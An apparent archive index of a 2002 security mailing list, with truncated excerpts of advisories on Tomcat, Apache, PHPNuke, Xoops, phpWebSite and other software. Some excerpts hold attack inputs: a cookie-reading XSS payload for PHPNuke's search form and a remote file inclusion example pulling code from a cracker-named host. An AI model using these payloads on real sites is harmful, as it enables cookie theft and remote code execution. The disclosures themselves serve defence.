HP Procurve 4000M Stacked Switch HTTP Reset Vulnerability

2002-09-24 Thread Brook Powers
Techserve, Inc. www.tech-serve.com Security Advisory Advisory Name: HP Procurve 4000M Stacked Switch HTTP Reset Vulnerability Release Date: 09/23/2002 Platform: HP Procurve 4000M Switch (J4121A) Application: Firmware

Xoops RC3 script injection vulnerability

2002-09-24 Thread das
| Xoops RC3 script injection vulnerability | PROGRAM: Xoops VENDOR: http://www.xoops.org/ VULNERABLE VERSIONS: RC3.0.4,possibly previous versions IMMUNE VERSIONS: no immune current versions SEVERITY: high

Slapper worm redux;

2002-09-24 Thread Ron DuFresne
Those folks relying upon security through obscurity might well wish to get on the ball and fully patch-up; September 23 VNUNET.COM. A suspect has been arrested on suspicion of authoring the Slapper worm. But although the threat of the worm seems to have been short-lived, a new variant is alread

JSP source code exposure in Tomcat 4.x

2002-09-24 Thread Rossen Raykov
Tomcat 4.x JSP source exposure security advisory 1. Summary Tomcat 4.0.4 and 4.1.10 (probably all other earlier versions also) are vulnerable to source code exposure by using the default servlet org.apache.catalina.servlets.DefaultServlet. 2. Details: Let say you have valid URL like htt

Re: JSP source code exposure in Tomcat 4.x

2002-09-24 Thread DominusQ
On Tue, 24 Sep 2002 10:12:44 -0400 Rossen Raykov <[EMAIL PROTECTED]> wrote: > Tomcat 4.x JSP source exposure security advisory > > 1. Summary > Tomcat 4.0.4 and 4.1.10 (probably all other earlier versions also) are > vulnerable to source code exposure by using the default servlet > org.apac

Apache 2.0.(39|40) DOS (PHP!)

2002-09-24 Thread shaddup
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -=~=-_-=~=-_-=~=- I put PHP in the title so I know this message will reach the "sekur1ty c0mmun1ty", that *knows* that PHP is bad, because it's easy to write insecure applications, unlike C. - -=~=-_-=~=-_-=~=- Problem: o Apache 2.0 (.39 and .40

RE: Trillian Remote DoS Attack - AIM

2002-09-24 Thread Joshua Wright
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I was unable to reproduce a Trillian crash in this manner. Using Trillian 0.74b on Windows XP sp1, test client Windows 2000 sp2 using AOL IM 5.0.2938. Sent strings "P > O < C", "ee > 3e < 3dsaf", "3 > 3 < 3", "computer > security < now" using a vari

Re: IE6 SSL Certificate Chain Verification

2002-09-24 Thread Jason
- snip - Details: *** If (one of) the CA-CERT(s) sent by the server is invalid, (e.g., expired), IE6 first seeks for valid (newer) CA-CERT(s) in its own local repository (under Trusted Root Certification Authorities and in other lists) and tries to verify SERVER-CERT with it. If suc

PHPNUKE 6 XSS Vulnerabilities

2002-09-24 Thread Mark Grimes
http://www.phpnuke.org/modules.php?name=Search Enter: >alert(document.cookie); in form, click Search. Needless to say these bugs won't go away. The vendor WOULD HAVE been contacted if they just gave an email address without having to subscribe to nukesupport/phpnuke - maybe I don't use it. Lik

Re: PHP source injection in phpWebSite

2002-09-24 Thread Matthias Bauer
Just as a side note, quite a lot of sites are open to this kind of attacks, namely including files from other servers. fopen_wrappers and unsafe programming are to blame here. Lots of scripts do include($file); // $file is in GPC So if $file is "http://www.cracker.com/somefile.php"; that file g

RE: Trillian Remote DoS Attack - AIM

2002-09-24 Thread Eric Stevens
Tried unsuccessfully to replicate on Trillian 0.73, sending from Trillian Pro 1.0. Sent P > O < C by itself. Sent during both encrypted, and non-encrypted sessions. No crash reported on either end. -MightyE -Original Trimmed Message- From: Spikeman [mailto:[EMAIL PROTECTED]] Subject:

Re: JSP source code exposure in Tomcat 4.x

2002-09-24 Thread Marcin Jackowski
[...] > > 3.2 Workaround: [...] Quicker (brute) method - remove completely $TOMCAT_HOME/server/lib/servlets-default.jar. The server complains but applications seem to work correctly (unless you're using it). Stated for Tomcat version 4.0.1, 4.0.4 and 4.1.10. Marcin Jackowski

Information Disclosure with Invision Board installation (fwd)

2002-09-24 Thread Gossi The Dog
Since the vendors didn't bother to respond, I might as well forward this on. Basic jizt - Invision Board (all version) - installation guide copies across phpinfo.php, a file which calls phpinfo(). Example; http://blahblahblah.corp.com/phpinfo.php (just do a search on Google for "Invision Boa